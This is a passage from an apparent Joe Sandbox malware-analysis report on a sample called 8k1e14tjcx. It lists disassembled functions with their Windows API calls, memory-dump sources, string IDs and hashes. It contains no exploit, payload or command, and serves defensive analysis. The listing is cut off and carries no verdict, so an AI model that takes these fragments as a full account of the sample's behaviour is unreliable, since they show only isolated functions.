                                                                                                                          • Part of subcall function 00E9A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E9977F,?,?,00E995CF,?,?,?,?,?,00EC2641), ref: 00E9A21F
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00E97139
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00E97155
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00E97298
                                                                                                                          • Part of subcall function 00E99DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00E973BC,?,?,?,00000000), ref: 00E99DBC
                                                                                                                          • Part of subcall function 00E99DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00E99E70
                                                                                                                          • Part of subcall function 00E99620: CloseHandle.KERNELBASE(000000FF,?,?,00E995D6,?,?,?,?,?,00EC2641,000000FF), ref: 00E9963B
                                                                                                                          • Part of subcall function 00E9A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E9A325,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A501
                                                                                                                          • Part of subcall function 00E9A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E9A325,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A532
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                        • API String ID: 3983180755-3508440684
                                                                                                                        • Opcode ID: c86c15b0eb9c0f4f0d4df9af11bd1c1ccaeb63bb3bc9f029addbd5ac3782b466
                                                                                                                        • Instruction ID: 5b794d2d12140741cda668175d70a238bf63ac7a714beadce427691bce4499fd
                                                                                                                        • Opcode Fuzzy Hash: c86c15b0eb9c0f4f0d4df9af11bd1c1ccaeb63bb3bc9f029addbd5ac3782b466
                                                                                                                        • Instruction Fuzzy Hash: AEC1C5B1914644AEDF21EB74CC42FEEB3E8AF04304F04555AF996F7282D774AA488B61
                                                                                                                        Function 00EBD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                        • Opcode ID: ab19212ccc3e02b87a5cf02590e1a03e706c05b3344464f2f011f547c897a815
                                                                                                                        • Instruction ID: bd57362ec4a15a9a096c98f60c0e83612de0fbcb5c826f072854d1763568e03d
                                                                                                                        • Opcode Fuzzy Hash: ab19212ccc3e02b87a5cf02590e1a03e706c05b3344464f2f011f547c897a815
                                                                                                                        • Instruction Fuzzy Hash: 3DC23A71E086288FDB25CE28DD407EAB7B5EB84305F1551EAD84EF7240E779AE858F40
                                                                                                                        Function 00E932F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog_swprintf
                                                                                                                        • String ID: CMT$h%u$hc%u
                                                                                                                        • API String ID: 146138363-3282847064
                                                                                                                        • Opcode ID: e47e93626d59bad4385f98d9c1c9dc68a974db6c8ea45099bfea83561c8a2b7a
                                                                                                                        • Instruction ID: 48552a25212bc9c4e86a6176b1e03f835c0a37624c60c912fd9954ab60681736
                                                                                                                        • Opcode Fuzzy Hash: e47e93626d59bad4385f98d9c1c9dc68a974db6c8ea45099bfea83561c8a2b7a
                                                                                                                        • Instruction Fuzzy Hash: 3732D471514384AFDF18DF74C895AEA3BE5AF15304F04147DFD8AAB282DB70AA49CB20
                                                                                                                        Function 00E9286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E92874
                                                                                                                        • _strlen.LIBCMT ref: 00E92E3F
                                                                                                                          • Part of subcall function 00EA02BA: __EH_prolog.LIBCMT ref: 00EA02BF
                                                                                                                          • Part of subcall function 00EA1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E9BAE9,00000000,?,?,?,0001043A), ref: 00EA1BA0
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E92F91
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                        • String ID: CMT
                                                                                                                        • API String ID: 1206968400-2756464174
                                                                                                                        • Opcode ID: 0148fedfdded0fa162c1252ee9c3fd028afe841293bc3181a5f3743c97f8a47c
                                                                                                                        • Instruction ID: d380dd11360fdc31a28bb29a6acc3e8ac3b1ae6e9442c4b39a51429b69648377
                                                                                                                        • Opcode Fuzzy Hash: 0148fedfdded0fa162c1252ee9c3fd028afe841293bc3181a5f3743c97f8a47c
                                                                                                                        • Instruction Fuzzy Hash: C16214716003449FDF19DF38C886AEA3BE1EF54304F08547EED9AAB282DB759945CB60
                                                                                                                        Function 00EAE6A3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(80000000,,0000001C,00EAE7DD,00000000,?,?,?,?,?,?,?,00EAE5E8,00000004,00EF1CEC,00EAE86D), ref: 00EAE6B4
                                                                                                                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00EAE5E8,00000004,00EF1CEC,00EAE86D), ref: 00EAE6CF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoQuerySystemVirtual
                                                                                                                        • String ID: D$
                                                                                                                        • API String ID: 401686933-250975860
                                                                                                                        • Opcode ID: 01b9f0e9c32cedf92d5b57a6cbfa7160d9748def70f21d38908451b84c14ff62
                                                                                                                        • Instruction ID: 7469c24ed88c2c479464312ccb72f81ad2aab7d43843f145be5301022cf3ba85
                                                                                                                        • Opcode Fuzzy Hash: 01b9f0e9c32cedf92d5b57a6cbfa7160d9748def70f21d38908451b84c14ff62
                                                                                                                        • Instruction Fuzzy Hash: 4F01F7726001096FDB14DE29DC09BEE7BAAAFC9328F0DC121ED19EB250D634E9068680
                                                                                                                        Function 00EAF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00EAF844
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00EAF910
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EAF930
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00EAF93A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 254469556-0
                                                                                                                        • Opcode ID: 7815b587d24b92e9b62028bbadd6739c6303fa25d2ca83febb1889ba4bb8e9d0
                                                                                                                        • Instruction ID: ba344ba809039446df7c8b9a07e369a89175c9c8a2606ba318f03f8d627dd04a
                                                                                                                        • Opcode Fuzzy Hash: 7815b587d24b92e9b62028bbadd6739c6303fa25d2ca83febb1889ba4bb8e9d0
                                                                                                                        • Instruction Fuzzy Hash: BE312B75D052199FDF10DFA5D989BCDBBF8AF09305F1040AAE40CAB250EB719B898F44
                                                                                                                        Function 00EB8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00EB8FB5
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00EB8FBF
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00EB8FCC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3906539128-0
                                                                                                                        • Opcode ID: 275fb83821d7a4d4e52f5816b5b020b3fe1f0eea26b5dbbc6a0b4e6d7d3e073b
                                                                                                                        • Instruction ID: 1db415a9e62b2db26ad1ea3f568f4e658e95d8572cadd68156dec9efea5b5b08
                                                                                                                        • Opcode Fuzzy Hash: 275fb83821d7a4d4e52f5816b5b020b3fe1f0eea26b5dbbc6a0b4e6d7d3e073b
                                                                                                                        • Instruction Fuzzy Hash: A731D37490122CABCB21DF65DD88BDDBBB8AF08311F5052EAE41CA6350EB309F858F44
                                                                                                                        Function 00EBD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                        • Instruction ID: 648a9535565420abd29598b0b793d8ca998fc02fc15e6ba39961e91c15d49a63
                                                                                                                        • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                        • Instruction Fuzzy Hash: AA023C71E052199BDF18CFA9D8806EEBBF1EF48314F25816AD819F7284E730A9418B80
                                                                                                                        Function 00EAAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00EAAF35
                                                                                                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,00ECE72C,?,?), ref: 00EAAF84
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FormatInfoLocaleNumber
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2169056816-0
                                                                                                                        • Opcode ID: 27d236f1d4a14e90b31312f682f84f1eb98c7b2ba37213db701527b8ddb38c05
                                                                                                                        • Instruction ID: 3e93bb71db43823289add0623848cbbfe4f7f33d59e24f9ef8d1298a81a65ab5
                                                                                                                        • Opcode Fuzzy Hash: 27d236f1d4a14e90b31312f682f84f1eb98c7b2ba37213db701527b8ddb38c05
                                                                                                                        • Instruction Fuzzy Hash: 13015E3A140348AED7109F75DC45F9A77B8EF49710F209422FA05FB250E371A929CBA5
                                                                                                                        Function 00E96C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00E96DDF,00000000,00000400), ref: 00E96C74
                                                                                                                        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00E96C95
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3479602957-0
                                                                                                                        • Opcode ID: 2f47c1c5be14464c758cc94ae19aa5479c0c0745e081b02a3ae5cbab57a7126f
                                                                                                                        • Instruction ID: e75d945145baa2cd7cbd934d8ab3c5b537feedbb341b4dc115959e7b34f12a8b
                                                                                                                        • Opcode Fuzzy Hash: 2f47c1c5be14464c758cc94ae19aa5479c0c0745e081b02a3ae5cbab57a7126f
                                                                                                                        • Instruction Fuzzy Hash: BAD0C932344300BFFE110B728D07F6ABB9ABF45B51F18D415B7A5F80E0CA759429A629
                                                                                                                        Function 00EC19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00EC19EF,?,?,00000008,?,?,00EC168F,00000000), ref: 00EC1C21
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3997070919-0
                                                                                                                        • Opcode ID: 303c61e333b66e26338054f80e62e96201a6eb8e14643609377e1e9957e5fbcc
                                                                                                                        • Instruction ID: 92475b75b362a01f7687713c86cc96ae663bc8bdc4e1c1ae9da3bf42990b943e
                                                                                                                        • Opcode Fuzzy Hash: 303c61e333b66e26338054f80e62e96201a6eb8e14643609377e1e9957e5fbcc
                                                                                                                        • Instruction Fuzzy Hash: 71B11C31110609DFD719CF28C586FA57BA0FF46368F25969CE899DF2A2C336D992CB40
                                                                                                                        Function 00EAF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00EAF66A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2325560087-0
                                                                                                                        • Opcode ID: e65e0a7d14dba7479c0c0963f269426e2188952ab3b2e70582737a09d9e92492
                                                                                                                        • Instruction ID: adcefa2e7be714e995f57931459404dcb6679851e767843966020dfa5bb14544
                                                                                                                        • Opcode Fuzzy Hash: e65e0a7d14dba7479c0c0963f269426e2188952ab3b2e70582737a09d9e92492
                                                                                                                        • Instruction Fuzzy Hash: AC519F71910619CFDB28CF95E8857AAB7F0FB89308F24947AE411FB350D376A905CB50
                                                                                                                        Function 00E9B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00E9B16B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Version
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1889659487-0
                                                                                                                        • Opcode ID: 6a5944598a1c9f9b741cb75120cee78fc15eeaa60b57c0d36fe08bbbd2e49e62
                                                                                                                        • Instruction ID: 5054a799452d5f2fb9942a5fafcbf7e4211639bcf11494969573f91b3d0dd8a9
                                                                                                                        • Opcode Fuzzy Hash: 6a5944598a1c9f9b741cb75120cee78fc15eeaa60b57c0d36fe08bbbd2e49e62
                                                                                                                        • Instruction Fuzzy Hash: 60F030B4E012089FDB18DB1AFD92AD573F1F748315F1042A6D515B3390C370AD89CE60
                                                                                                                        Function 00E940FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: gj
                                                                                                                        • API String ID: 0-4203073231
                                                                                                                        • Opcode ID: 44645025dff5a23947ce2adc8d96133aad80d36d358c79fed7cd7f5106e651ea
                                                                                                                        • Instruction ID: a2fd3276db800d40a893f16c50b2425b646d0fb4e5f635607d1a87d24d7ea3dc
